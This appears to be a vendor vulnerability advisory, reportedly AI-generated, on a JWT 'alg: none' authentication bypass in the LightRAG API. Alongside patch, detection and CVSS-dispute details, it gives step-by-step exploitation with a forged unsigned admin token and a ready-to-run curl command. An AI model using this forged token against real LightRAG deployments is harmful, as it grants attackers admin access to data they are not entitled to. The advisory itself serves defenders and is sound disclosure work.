CVE-2026-39413: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-39413 is a JWT algorithm confusion vulnerability in the LightRAG API that allows attackers to forge authentication tokens by specifying 'alg': 'none' in the JWT header, bypassing authentication entirely. It affects the lightrag-hku pip package versions up to and including 1.4.13, with version 1.4.14 containing the fix. The vulnerability was published on April 7–8, 2026 via GitHub Advisory GHSA-8ffj-4hx4-9pgf. The official CVSS v3.1 score assigned by GitHub is 4.2 (Moderate), though independent researchers have argued the true severity is closer to 9.1 (Critical) due to the low exploitation barriers (Github Advisory, HKUDS Advisory).

Technical details

The root cause is improper verification of cryptographic signatures (CWE-347), specifically in lightrag/api/auth.py at the validate_token method (line 128), where jwt.decode(token, self.secret, algorithms=[self.algorithm]) is called without explicitly excluding the 'none' algorithm. Because the PyJWT library historically accepted alg: none tokens as valid when not explicitly blocked, an attacker can craft a JWT with 'alg': 'none' in the header and an arbitrary payload — including elevated roles like admin — and submit it without any signature. The fix, applied in commit 728f2e5, adds an explicit check that rejects 'none' both at initialization and during token validation, and raises an error if the configured algorithm is insecure (HKUDS Advisory, Patch Commit).

Impact

Successful exploitation allows an attacker to impersonate any user, including administrators, without possessing valid credentials, gaining full unauthorized access to all protected LightRAG API endpoints. The primary impact is a high confidentiality breach, as the attacker can access all data and functionality exposed by the API under the forged identity. Integrity may also be at risk if the attacker uses admin-level access to modify knowledge graph data or system configurations within the LightRAG instance (Github Advisory, HKUDS Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub security advisory, including a concrete crafted JWT token and a ready-to-run curl command demonstrating the attack (HKUDS Advisory). There is no current evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.023%, indicating a low (but non-zero) probability of exploitation in the near term. Notably, independent researchers have disputed the official CVSS score, arguing the actual attack requires no privileges, no user interaction, and low complexity — suggesting the real-world exploitability is significantly higher than the official rating implies (CVSS Dispute Issue).

Exploitation steps

  1. Identify target: Locate a LightRAG API instance running lightrag-hku version ≤ 1.4.13, accessible over the network (e.g., via Shodan, Censys, or direct knowledge of deployment).
  2. Craft malicious JWT header: Construct a JWT header specifying 'alg': 'none' and 'typ': 'JWT', then Base64url-encode it: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.
  3. Craft malicious JWT payload: Create a payload claiming an admin identity, e.g., {'sub': 'admin', 'exp': <future_timestamp>, 'role': 'admin'}, and Base64url-encode it: eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.
  4. Assemble unsigned token: Concatenate the encoded header and payload with a period separator and an empty signature: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.
  5. Send forged request: Submit the token in the Authorization: Bearer header to any protected API endpoint:
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://<target>:8000/api/protected-endpoint
  1. Achieve unauthorized access: The server's jwt.decode() call accepts the unsigned token as valid, granting full admin-level access to the API (HKUDS Advisory).

Indicators of compromise

  • Network: HTTP requests to LightRAG API endpoints with Authorization: Bearer tokens where the JWT header decodes to {"alg": "none", "typ": "JWT"}; requests from unexpected source IPs to the LightRAG API port (default 8000).
  • Logs: API access logs showing successful authentication (HTTP 200) for requests bearing unsigned JWTs (tokens ending with a trailing period and no signature segment, e.g., <header>.<payload>.); repeated access to admin-only endpoints from accounts not previously seen.
  • Application Behavior: Unexpected admin-level operations (data queries, configuration changes, bulk data exports) in the LightRAG API logs without corresponding legitimate user sessions.

Mitigation and workarounds

Upgrade lightrag-hku to version 1.4.14 or later immediately, which explicitly rejects the 'none' algorithm both at initialization and during token validation (Patch Commit). As a workaround for environments that cannot upgrade immediately, manually patch lightrag/api/auth.py to hardcode the allowed algorithm list: payload = jwt.decode(token, self.secret, algorithms=['HS256']). Additionally, monitor authentication logs for tokens with missing or empty signatures and consider placing the API behind a network perimeter that restricts access to trusted clients only (Github Advisory).

Community reactions

A community researcher (karelorigino) filed a formal dispute on the GitHub Advisory Database, arguing that the official CVSS score of 4.2 (with AC:H, PR:H, UI:R) significantly underestimates the real-world exploitability, and proposed a corrected score of 9.1 (Critical) with AC:L, PR:N, UI:N — reflecting that the attack requires no privileges and no user interaction (CVSS Dispute Issue). The issue remains open as of the time of this report, and no official response from GitHub has been published.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management